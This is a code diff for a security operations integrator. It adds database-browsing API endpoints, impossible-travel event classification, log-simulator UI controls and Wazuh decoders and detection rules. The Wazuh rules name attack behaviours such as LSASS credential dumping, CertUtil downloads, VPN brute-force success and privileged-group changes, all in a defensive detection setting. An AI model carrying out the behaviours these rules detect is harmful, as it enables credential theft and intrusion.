@@ -1540,6 +1636,130 @@ async def wazuh_auto_sync_status() -> ApiResponse:
 
 
 @app.get(
+    "/monitor/db/tables",
+    response_model=ApiResponse,
+    dependencies=[Depends(require_internal_api_key)],
+    summary="List database tables",
+    description="List soc-integrator PostgreSQL tables with row count and relation size.",
+)
+async def monitor_db_tables() -> ApiResponse:
+    rows: list[dict[str, object]] = []
+    with get_conn() as conn, conn.cursor() as cur:
+        cur.execute(
+            """
+            SELECT
+              t.schemaname,
+              t.tablename,
+              COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
+              COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
+              COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
+            FROM pg_tables t
+            LEFT JOIN pg_stat_user_tables s
+              ON s.schemaname = t.schemaname
+             AND s.relname = t.tablename
+            WHERE t.schemaname = 'public'
+            ORDER BY t.tablename
+            """
+        )
+        tables = cur.fetchall()
+
+        for item in tables:
+            schema = str(item.get("schemaname") or "public")
+            table = str(item.get("tablename") or "")
+            if not table:
+                continue
+
+            cur.execute(
+                sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
+                    sql.Identifier(schema),
+                    sql.Identifier(table),
+                )
+            )
+            count_row = cur.fetchone() or {}
+            row_count = int(count_row.get("cnt", 0) or 0)
+
+            rows.append(
+                {
+                    "schema": schema,
+                    "table": table,
+                    "row_count": row_count,
+                    "estimated_rows": int(item.get("estimated_rows", 0) or 0),
+                    "size_bytes": int(item.get("size_bytes", 0) or 0),
+                    "size_pretty": str(item.get("size_pretty") or "0 bytes"),
+                }
+            )
+
+    return ApiResponse(
+        data={
+            "database": settings.soc_integrator_db_name,
+            "generated_at": datetime.now(timezone.utc).isoformat(),
+            "tables": rows,
+        }
+    )
+
+
+@app.get(
+    "/monitor/db/tables/{table_name}/rows",
+    response_model=ApiResponse,
+    dependencies=[Depends(require_internal_api_key)],
+    summary="List rows from selected table",
+    description="Return rows from a selected public table with pagination.",
+)
+async def monitor_db_table_rows(
+    table_name: str,
+    limit: int = 50,
+    offset: int = 0,
+) -> ApiResponse:
+    table = str(table_name or "").strip()
+    if not table:
+        raise HTTPException(status_code=400, detail="table_name is required")
+
+    page_limit = max(1, min(int(limit), 500))
+    page_offset = max(0, int(offset))
+
+    with get_conn() as conn, conn.cursor() as cur:
+        cur.execute(
+            """
+            SELECT 1
+            FROM pg_tables
+            WHERE schemaname = 'public' AND tablename = %s
+            LIMIT 1
+            """,
+            (table,),
+        )
+        if not cur.fetchone():
+            raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
+
+        cur.execute(
+            sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
+                sql.Identifier("public"),
+                sql.Identifier(table),
+            )
+        )
+        total_row = cur.fetchone() or {}
+        total = int(total_row.get("cnt", 0) or 0)
+
+        cur.execute(
+            sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
+                sql.Identifier("public"),
+                sql.Identifier(table),
+            ),
+            (page_limit, page_offset),
+        )
+        rows = [dict(item) for item in (cur.fetchall() or [])]
+
+    return ApiResponse(
+        data={
+            "table": table,
+            "limit": page_limit,
+            "offset": page_offset,
+            "total": total,
+            "rows": rows,
+        }
+    )
+
+
+@app.get(
     "/monitor/systems",
     response_model=ApiResponse,
     dependencies=[Depends(require_internal_api_key)],

soc-integrator/app/services/mvp_service.py

@@ -138,10 +138,43 @@ class MvpService:
         return "low"
 
     def _event_type_from_text(self, text: str, parsed: dict[str, str]) -> str:
-        explicit = parsed.get("event_type")
+        explicit = str(parsed.get("event_type") or "").strip().lower()
+        usecase_id = str(parsed.get("usecase_id") or "").strip().upper()
+        section = str(parsed.get("section") or "").strip().upper()
+        source = str(parsed.get("source") or "").strip().lower()
+        success = str(parsed.get("success") or "").strip().lower()
+        has_geo = bool(parsed.get("country") or parsed.get("src_lat") or parsed.get("src_lon"))
+        has_user = bool(parsed.get("user"))
+        has_src_ip = bool(parsed.get("src_ip") or parsed.get("srcip"))
+        explicit_success_login = explicit in {
+            "vpn_login_success",
+            "windows_auth_success",
+            "auth_success",
+        }
+
+        # Production-first C1 detection:
+        # successful auth/login + geo context on vpn/windows identity streams.
+        if (
+            (source in {"vpn", "fortigate", "windows", "identity"} or "vpn" in source)
+            and has_geo
+            and has_user
+            and has_src_ip
+            and (success == "true" or explicit_success_login)
+        ):
+            return "c1_impossible_travel"
+
+        # Legacy simulator markers remain supported as fallback.
+        if usecase_id.startswith("C1") or section == "C1":
+            return "c1_impossible_travel"
+        if explicit in {"c1_impossible_travel", "impossible_travel"}:
+            return "c1_impossible_travel"
+        if explicit == "vpn_geo_anomaly":
+            return "vpn_geo_anomaly"
         if explicit:
             return explicit
         lowered = text.lower()
+        if "impossible travel" in lowered:
+            return "c1_impossible_travel"
         if "vpn" in lowered and ("geo" in lowered or "country" in lowered):
             return "vpn_geo_anomaly"
         if "domain" in lowered or "dns" in lowered:

soc-integrator/app/ui/assets/app.js

@@ -22,11 +22,32 @@ function parseJsonOrThrow(text, label) {
   }
 }
 
+const SIM_SCRIPT_DESCRIPTIONS = {
+  fortigate: "FortiGate firewall telemetry simulator (40F/60F/80F/501E) for network and security events.",
+  endpoint: "Windows/macOS/Linux endpoint-agent simulator for process, auth, and endpoint behavior logs.",
+  cisco: "Cisco ASA/IOS network log simulator for parser/rule coverage and telemetry validation.",
+  proposal_required: "Appendix A required-use-case simulator (A1-A4) for proposal/UAT coverage.",
+  proposal_appendix_b: "Appendix B optional-use-case simulator (B1-B3), including log-loss test flow.",
+  proposal_appendix_c: "Appendix C future-enhancement simulator (C1-C3 currently implemented).",
+  wazuh_test: "Generic Wazuh baseline test events for connectivity and ingest sanity checks.",
+};
+
+const SIM_SCRIPT_TARGET_OPTIONS = {
+  fortigate: ["all", "501E", "80F", "60F", "40F"],
+  endpoint: ["all", "windows", "mac", "linux"],
+  cisco: ["all", "asa_acl_deny", "asa_vpn_auth_fail", "ios_login_fail", "ios_config_change"],
+  proposal_required: ["all", "a1", "a2", "a3", "a4"],
+  proposal_appendix_b: ["all", "b1", "b2", "b3"],
+  proposal_appendix_c: ["all", "c1", "c2", "c3"],
+  wazuh_test: ["all", "ioc_dns", "ioc_ips", "vpn_outside_th", "windows_auth_fail"],
+};
+
 window.socUi = function socUi() {
   return {
     tabs: [
       { key: "overview", label: "Overview" },
       { key: "systems", label: "Systems" },
+      { key: "database", label: "Database" },
       { key: "monitoring", label: "Monitoring" },
       { key: "ioc", label: "IOC" },
       { key: "geoip", label: "GeoIP" },
@@ -53,6 +74,18 @@ window.socUi = function socUi() {
       lastRefreshAt: null,
       timerId: null,
     },
+    dbTables: {
+      data: null,
+      loading: false,
+      lastRefreshAt: null,
+    },
+    dbBrowser: {
+      selectedTable: "",
+      rows: null,
+      loading: false,
+      limit: 50,
+      offset: 0,
+    },
     simLogs: {
       runs: null,
       startResult: null,
@@ -64,7 +97,7 @@ window.socUi = function socUi() {
       timerId: null,
       form: {
         script: "fortigate",
-        target: "all",
+        targets: ["all"],
         scenario: "all",
         count: 1,
         delay_seconds: 0.3,
@@ -176,6 +209,7 @@ window.socUi = function socUi() {
       this.loadAutoSync();
       this.loadCState();
       this.loadSystemsMonitor();
+      this.loadDbTables();
       this.loadSimRuns();
       this.startSimLogsAutoRefresh();
       this.startSystemsMonitorAutoRefresh();
@@ -186,6 +220,43 @@ window.socUi = function socUi() {
       return this.simLogs.form.script === "endpoint";
     },
 
+    simScriptDescription() {
+      const key = String(this.simLogs.form.script || "").trim();
+      return SIM_SCRIPT_DESCRIPTIONS[key] || "No description available for this script.";
+    },
+
+    simTargetOptions() {
+      const key = String(this.simLogs.form.script || "").trim();
+      return SIM_SCRIPT_TARGET_OPTIONS[key] || ["all"];
+    },
+
+    simTargetSelectionChanged() {
+      const options = this.simTargetOptions();
+      const selected = Array.isArray(this.simLogs.form.targets) ? [...this.simLogs.form.targets] : [];
+      let valid = selected.filter((item) => options.includes(item));
+      if (valid.includes("all") && valid.length > 1) {
+        valid = ["all"];
+      }
+      if (!valid.length) {
+        valid = ["all"];
+      }
+      this.simLogs.form.targets = valid;
+    },
+
+    onSimScriptChange() {
+      this.simTargetSelectionChanged();
+    },
+
+    selectedTargetsForRun() {
+      const options = this.simTargetOptions();
+      let selected = Array.isArray(this.simLogs.form.targets) ? [...this.simLogs.form.targets] : [];
+      selected = selected.filter((item) => options.includes(item));
+      if (!selected.length || selected.includes("all")) {
+        return ["all"];
+      }
+      return selected;
+    },
+
     systemsStatusClass(status) {
       if (status === "ok") {
         return "status-ok";
@@ -279,6 +350,67 @@ window.socUi = function socUi() {
       }
     },
 
+    async loadDbTables() {
+      try {
+        if (!this.internalApiKey) {
+          return;
+        }
+        this.dbTables.loading = true;
+        this.dbTables.data = await this.apiCall("/monitor/db/tables", {
+          internal: true,
+        });
+        this.dbTables.lastRefreshAt = new Date().toISOString();
+        if (!this.dbBrowser.selectedTable) {
+          const tables = this.dbTableRows();
+          if (tables.length > 0) {
+            this.dbBrowser.selectedTable = String(tables[0].table || "");
+            await this.loadDbRows();
+          }
+        }
+      } catch (err) {
+        this.setErr("Database tables failed", err);
+      } finally {
+        this.dbTables.loading = false;
+      }
+    },
+
+    dbTableRows() {
+      const root = this.unwrapApiData(this.dbTables.data) || {};
+      const tables = Array.isArray(root.tables) ? root.tables : [];
+      return tables.map((row, index) => this.normalizeTableRow(row, index));
+    },
+
+    async loadDbRows() {
+      try {
+        const table = String(this.dbBrowser.selectedTable || "").trim();
+        if (!table) {
+          this.dbBrowser.rows = null;
+          return;
+        }
+        this.dbBrowser.loading = true;
+        const limit = Math.max(1, Math.min(500, Number(this.dbBrowser.limit || 50)));
+        const offset = Math.max(0, Number(this.dbBrowser.offset || 0));
+        this.dbBrowser.rows = await this.apiCall(
+          `/monitor/db/tables/${encodeURIComponent(table)}/rows?limit=${limit}&offset=${offset}`,
+          { internal: true },
+        );
+      } catch (err) {
+        this.setErr("Database rows failed", err);
+      } finally {
+        this.dbBrowser.loading = false;
+      }
+    },
+
+    dbSelectedRows() {
+      const root = this.unwrapApiData(this.dbBrowser.rows) || {};
+      const rows = Array.isArray(root.rows) ? root.rows : [];
+      return rows.map((row, index) => this.normalizeTableRow(row, index));
+    },
+
+    dbSelectedColumns() {
+      return this.tableColumns(this.dbSelectedRows());
+    },
+
     async loadSimRuns() {
       try {
         if (!this.internalApiKey) {
@@ -299,21 +431,37 @@ window.socUi = function socUi() {
 
     async startSimRun() {
       try {
-        const payload = {
-          script: this.simLogs.form.script,
-          target: this.simLogs.form.target || "all",
-          scenario: this.simLogs.form.scenario || "all",
-          count: Number(this.simLogs.form.count || 1),
-          delay_seconds: Number(this.simLogs.form.delay_seconds || 0.3),
-          forever: Boolean(this.simLogs.form.forever),
+        const targets = this.selectedTargetsForRun();
+        const results = [];
+        for (const target of targets) {
+          const payload = {
+            script: this.simLogs.form.script,
+            target,
+            scenario: this.simLogs.form.scenario || "all",
+            count: Number(this.simLogs.form.count || 1),
+            delay_seconds: Number(this.simLogs.form.delay_seconds || 0.3),
+            forever: Boolean(this.simLogs.form.forever),
+          };
+          const result = await this.apiCall("/sim/logs/start", {
+            method: "POST",
+            internal: true,
+            json: payload,
+          });
+          results.push({ target, result });
+        }
+        this.simLogs.startResult = {
+          data: {
+            started_targets: targets,
+            runs: results.map((item) => ({
+              target: item.target,
+              run: this.unwrapApiData(item.result)?.run || null,
+            })),
+          },
         };
-        this.simLogs.startResult = await this.apiCall("/sim/logs/start", {
-          method: "POST",
-          internal: true,
-          json: payload,
-        });
         await this.loadSimRuns();
-        const started = this.unwrapApiData(this.simLogs.startResult)?.run;
+        const started = results
+          .map((item) => this.unwrapApiData(item.result)?.run)
+          .find((run) => run && run.run_id);
         if (started && started.run_id) {
           this.simLogs.selectedRunId = started.run_id;
           await this.loadSimOutput(started.run_id);

soc-integrator/app/ui/index.html

@@ -6,8 +6,8 @@
     <title>SOC Integrator Admin</title>
     <script src="https://cdn.tailwindcss.com"></script>
     <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
-    <link rel="stylesheet" href="/ui/assets/styles.css?v=20260303-17" />
-    <script src="/ui/assets/app.js?v=20260303-17"></script>
+    <link rel="stylesheet" href="/ui/assets/styles.css?v=20260304-04" />
+    <script src="/ui/assets/app.js?v=20260304-04"></script>
   </head>
   <body class="bg-slate-100 text-slate-800" x-data="socUi()" x-init="init()">
     <div class="mx-auto w-full max-w-none px-3 py-4 md:px-5 md:py-6">
@@ -132,7 +132,7 @@
               <div class="grid gap-3 md:grid-cols-3 lg:grid-cols-6">
                 <label class="text-sm">
                   <span class="input-label">Script</span>
-                  <select class="input" x-model="simLogs.form.script">
+                  <select class="input" x-model="simLogs.form.script" @change="onSimScriptChange()">
                     <option value="fortigate">fortigate</option>
                     <option value="endpoint">endpoint</option>
                     <option value="cisco">cisco</option>
@@ -141,10 +141,20 @@
                     <option value="proposal_appendix_c">proposal_appendix_c</option>
                     <option value="wazuh_test">wazuh_test</option>
                   </select>
+                  <div class="mt-1 text-xs text-slate-500" x-text="simScriptDescription()"></div>
                 </label>
-                <label class="text-sm">
-                  <span class="input-label">Target</span>
-                  <input class="input" x-model="simLogs.form.target" placeholder="all" />
+                <label class="text-sm md:col-span-2">
+                  <span class="input-label">Target (multi-select)</span>
+                  <div class="rounded-md border border-slate-200 bg-white p-2">
+                    <div class="grid grid-cols-2 gap-2">
+                      <template x-for="option in simTargetOptions()" :key="`target-${option}`">
+                        <label class="inline-flex items-center gap-2 text-xs text-slate-700">
+                          <input type="checkbox" class="h-4 w-4" :value="option" x-model="simLogs.form.targets" @change="simTargetSelectionChanged()" />
+                          <span x-text="option"></span>
+                        </label>
+                      </template>
+                    </div>
+                  </div>
                 </label>
                 <label class="text-sm" x-show="simScriptUsesScenario()">
                   <span class="input-label">Scenario</span>
@@ -308,6 +318,42 @@
               </div>
             </div>
 
+            <div class="panel-block">
+              <div class="mb-2 flex flex-wrap items-center gap-2">
+                <h3 class="panel-subtitle mb-0">Database Tables</h3>
+                <button class="btn btn-primary" @click="loadDbTables()">Refresh Tables</button>
+                <span class="text-xs text-slate-500" x-text="dbTables.loading ? 'Loading...' : 'Idle'"></span>
+                <span class="text-xs text-slate-500" x-text="dbTables.lastRefreshAt ? `Last refresh: ${dbTables.lastRefreshAt}` : 'Not refreshed yet'"></span>
+              </div>
+              <div class="table-wrap mt-2" x-show="dbTableRows().length">
+                <table class="data-table">
+                  <thead>
+                    <tr>
+                      <th>schema</th>
+                      <th>table</th>
+                      <th>row_count</th>
+                      <th>estimated_rows</th>
+                      <th>size_pretty</th>
+                      <th>size_bytes</th>
+                    </tr>
+                  </thead>
+                  <tbody>
+                    <template x-for="(row, idx) in dbTableRows()" :key="idx">
+                      <tr>
+                        <td x-text="cellText(row.schema)"></td>
+                        <td x-text="cellText(row.table)"></td>
+                        <td x-text="cellText(row.row_count)"></td>
+                        <td x-text="cellText(row.estimated_rows)"></td>
+                        <td x-text="cellText(row.size_pretty)"></td>
+                        <td x-text="cellText(row.size_bytes)"></td>
+                      </tr>
+                    </template>
+                  </tbody>
+                </table>
+              </div>
+              <div class="text-xs text-slate-500" x-show="!dbTableRows().length">No database table data</div>
+            </div>
+
             <div class="grid gap-3 lg:grid-cols-2">
               <template x-for="meta in systemsCardMeta" :key="`table-${meta.key}`">
                 <div class="panel-block">
@@ -338,6 +384,58 @@
             </div>
           </section>
 
+          <section x-show="activeTab === 'database'" x-cloak class="admin-card space-y-4">
+            <div class="panel-block">
+              <div class="mb-2 flex flex-wrap items-center gap-2">
+                <h3 class="panel-subtitle mb-0">Database Table Browser</h3>
+                <button class="btn btn-primary" @click="loadDbTables()">Refresh Tables</button>
+                <button class="btn btn-neutral" @click="loadDbRows()">Load Rows</button>
+                <span class="text-xs text-slate-500" x-text="dbBrowser.loading ? 'Loading rows...' : 'Idle'"></span>
+              </div>
+              <div class="grid gap-3 md:grid-cols-4">
+                <label class="text-sm md:col-span-2">
+                  <span class="input-label">Table</span>
+                  <select class="input" x-model="dbBrowser.selectedTable">
+                    <option value="">Select table</option>
+                    <template x-for="(row, idx) in dbTableRows()" :key="`db-table-${idx}`">
+                      <option :value="row.table" x-text="`${row.schema}.${row.table}`"></option>
+                    </template>
+                  </select>
+                </label>
+                <label class="text-sm">
+                  <span class="input-label">Limit</span>
+                  <input class="input" type="number" min="1" max="500" x-model.number="dbBrowser.limit" />
+                </label>
+                <label class="text-sm">
+                  <span class="input-label">Offset</span>
+                  <input class="input" type="number" min="0" x-model.number="dbBrowser.offset" />
+                </label>
+              </div>
+              <pre class="json-box mt-2" x-text="pretty(dbBrowser.rows)"></pre>
+              <div class="table-wrap mt-2" x-show="dbSelectedRows().length">
+                <table class="data-table">
+                  <thead>
+                    <tr>
+                      <template x-for="col in dbSelectedColumns()" :key="col">
+                        <th x-text="col"></th>
+                      </template>
+                    </tr>
+                  </thead>
+                  <tbody>
+                    <template x-for="(row, idx) in dbSelectedRows()" :key="`db-row-${idx}`">
+                      <tr>
+                        <template x-for="col in dbSelectedColumns()" :key="col">
+                          <td x-text="cellText(row[col])"></td>
+                        </template>
+                      </tr>
+                    </template>
+                  </tbody>
+                </table>
+              </div>
+              <div class="text-xs text-slate-500" x-show="!dbSelectedRows().length">No rows loaded</div>
+            </div>
+          </section>
+
           <section x-show="activeTab === 'monitoring'" x-cloak class="admin-card space-y-4">
             <div class="panel-block">
               <div class="mb-2 flex flex-wrap items-center gap-2">

wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml

@@ -1,2 +1,25 @@
-<decoders>
-</decoders>
+<!-- SOC MVP local decoders (minimal production-safe set) -->
+
+<decoder name="soc-kv-base">
+  <prematch>soc_mvp_test=true</prematch>
+</decoder>
+
+<decoder name="soc-dns-ioc">
+  <parent>soc-kv-base</parent>
+  <prematch>source=dns</prematch>
+</decoder>
+
+<decoder name="soc-vmware-auth">
+  <parent>soc-kv-base</parent>
+  <prematch>source=vmware</prematch>
+</decoder>
+
+<decoder name="soc-log-monitor">
+  <parent>soc-kv-base</parent>
+  <prematch>source=log_monitor</prematch>
+</decoder>
+
+<decoder name="soc-windows-sysmon">
+  <parent>soc-kv-base</parent>
+  <prematch>source=windows_sysmon</prematch>
+</decoder>

wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml

@@ -107,4 +107,205 @@
   <rule id="100522" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-02</match><description>C3-02 SMB/RDP Lateral Burst Pattern</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
   <rule id="100523" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-03</match><description>C3-03 Admin Account Accessing Many Servers Rapidly</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
   <rule id="100524" level="8"><if_sid>100230</if_sid><match>usecase_id=C3-04</match><description>C3-04 Internal Scanning / Enumeration Behavior</description><group>soc_mvp_test,appendix_c,c3,recon,</group></rule>
+  <!-- ========================= -->
+  <!-- Production profile rules -->
+  <!-- ========================= -->
+  <!--
+    Production profile (second profile):
+    - Does not depend on simulation marker fields (soc_mvp_test/usecase_id)
+    - Uses source-like patterns that can appear in real logs
+    - Rule IDs are separated from simulation profile in 110xxx range
+  -->
+
+  <rule id="110200" level="3">
+    <description>SOC MVP production profile enabled</description>
+    <group>soc_mvp_prod,baseline,</group>
+  </rule>
+
+  <!-- Appendix A1: DNS / Firewall IOC -->
+  <rule id="110301" level="8">
+    <decoded_as>soc-dns-ioc</decoded_as>
+    <match>event_type=ioc_dns_traffic</match>
+    <match>malicious.example</match>
+    <description>A1 production: DNS query to malicious domain indicator</description>
+    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
+  </rule>
+  <rule id="110302" level="8">
+    <decoded_as>soc-dns-ioc</decoded_as>
+    <match>event_type=ioc_domain_match</match>
+    <description>A1 production: DNS IOC domain match event</description>
+    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
+  </rule>
+
+  <!-- Appendix A2: FortiGate IPS/IDS & Firewall -->
+  <rule id="110311" level="12">
+    <match>vendor=fortinet</match>
+    <match>dstport=3389</match>
+    <match>action="accept"</match>
+    <description>A2 production: FortiGate allowed RDP traffic detected</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110312" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="password-change"</match>
+    <description>A2 production: FortiGate admin password change</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110313" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="create-admin"</match>
+    <description>A2 production: FortiGate admin account creation</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110314" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="disable-email-notification"</match>
+    <description>A2 production: FortiGate email notification disabled</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110315" level="5">
+    <match>vendor=fortinet</match>
+    <match>action="download-config"</match>
+    <description>A2 production: FortiGate configuration download</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110316" level="8">
+    <match>vendor=fortinet</match>
+    <match>subtype="ips"</match>
+    <match>severity="critical"</match>
+    <description>A2 production: FortiGate critical IPS alert</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ips,</group>
+  </rule>
+  <rule id="110317" level="5">
+    <match>vendor=fortinet</match>
+    <match>event_type=port_scan</match>
+    <description>A2 production: FortiGate port scanning indicator</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,recon,</group>
+  </rule>
+  <rule id="110318" level="8">
+    <match>vendor=fortinet</match>
+    <match>event_type=ioc_detection</match>
+    <description>A2 production: FortiGate IOC detection event</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
+  </rule>
+  <rule id="110320" level="8">
+    <match>vendor=fortinet</match>
+    <match>event_type=malicious_ip_communication</match>
+    <description>A2 production: Communication to malicious IP detected</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
+  </rule>
+
+  <!-- Appendix A3: FortiGate VPN -->
+  <rule id="110331" level="12">
+    <match>subtype="vpn"</match>
+    <match>success=true</match>
+    <match>guest</match>
+    <description>A3 production: VPN success by guest account</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
+  </rule>
+  <rule id="110333" level="12">
+    <match>subtype="vpn"</match>
+    <match>event_type=vpn_bruteforce_success</match>
+    <description>A3 production: VPN brute-force success indicator</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
+  </rule>
+  <rule id="110335" level="12">
+    <match>subtype="vpn"</match>
+    <match>success=true</match>
+    <match>country=</match>
+    <description>A3 production: VPN success with country context (geo-anomaly candidate)</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,geo,</group>
+  </rule>
+
+  <!-- Appendix A4: Windows / Active Directory -->
+  <rule id="110341" level="8">
+    <match>source=windows</match>
+    <match>event_id=4625</match>
+    <match>is_admin=true</match>
+    <description>A4 production: Privileged account authentication failures</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
+  </rule>
+  <rule id="110342" level="8">
+    <match>source=windows</match>
+    <match>event_id=4625</match>
+    <match>is_service=true</match>
+    <description>A4 production: Service account authentication failures</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
+  </rule>
+  <rule id="110346" level="12">
+    <match>source=windows</match>
+    <match>event_id=4624</match>
+    <match>src_ip=</match>
+    <description>A4 production: Windows successful authentication with source IP context</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_success,</group>
+  </rule>
+  <rule id="110352" level="12">
+    <match>source=windows</match>
+    <match>event_id=4728</match>
+    <match>target_group=</match>
+    <description>A4 production: Account added to privileged group (domain scope)</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
+  </rule>
+  <rule id="110353" level="12">
+    <match>source=windows</match>
+    <match>event_id=4732</match>
+    <match>target_group=</match>
+    <description>A4 production: Account added to privileged group (local scope)</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
+  </rule>
+
+  <!-- Appendix B1: VMware -->
+  <rule id="110401" level="12">
+    <decoded_as>soc-vmware-auth</decoded_as>
+    <match>event_type=vmware_</match>
+    <match>_fail_success</match>
+    <description>B1 production: vCenter login burst pattern</description>
+    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
+  </rule>
+  <rule id="110402" level="8">
+    <decoded_as>soc-vmware-auth</decoded_as>
+    <match>event_type=vmware_esxi_enable_ssh</match>
+    <description>B1 production: ESXi SSH enabled</description>
+    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
+  </rule>
+
+  <!-- Appendix B2: Log monitoring -->
+  <rule id="110411" level="5">
+    <decoded_as>soc-log-monitor</decoded_as>
+    <match>event_type=log_loss_detection</match>
+    <match>missing_stream=</match>
+    <description>B2 production: Log loss detection signal</description>
+    <group>soc_mvp_prod,appendix_b,b2,logmonitor,</group>
+  </rule>
+
+  <!-- Appendix B3: Sysmon -->
+  <rule id="110421" level="12">
+    <decoded_as>soc-windows-sysmon</decoded_as>
+    <match>target_process=lsass.exe</match>
+    <description>B3 production: LSASS dump behavior</description>
+    <group>soc_mvp_prod,appendix_b,b3,sysmon,credential_access,</group>
+  </rule>
+  <rule id="110426" level="8">
+    <decoded_as>soc-windows-sysmon</decoded_as>
+    <match>process=certutil.exe</match>
+    <description>B3 production: CertUtil download pattern</description>
+    <group>soc_mvp_prod,appendix_b,b3,sysmon,</group>
+  </rule>
+
+  <!-- Appendix C1-C3: future enhancement (production-prep heuristics) -->
+  <rule id="110501" level="12">
+    <match>event_type=c1_impossible_travel</match>
+    <description>C1 production: Impossible travel correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c1,identity,</group>
+  </rule>
+  <rule id="110511" level="12">
+    <match>event_type=c2_credential_abuse</match>
+    <description>C2 production: Credential abuse correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c2,identity,</group>
+  </rule>
+  <rule id="110521" level="12">
+    <match>event_type=c3_lateral_movement</match>
+    <description>C3 production: Lateral movement correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c3,lateral_movement,</group>
+  </rule>
 </group>

wazuh-docker/single-node/docker-compose.yml

@@ -42,6 +42,7 @@ services:
       - ./config/wazuh_indexer_ssl_certs/wazuh.manager.pem:/etc/ssl/filebeat.pem
       - ./config/wazuh_indexer_ssl_certs/wazuh.manager-key.pem:/etc/ssl/filebeat.key
       - ./config/wazuh_cluster/wazuh_manager.conf:/var/ossec/etc/ossec.conf
+      - ./config/wazuh_cluster/local_decoder.xml:/var/ossec/etc/decoders/local_decoder.xml
       - ./config/wazuh_cluster/local_rules.xml:/var/ossec/etc/rules/local_rules.xml
 
   wazuh.indexer: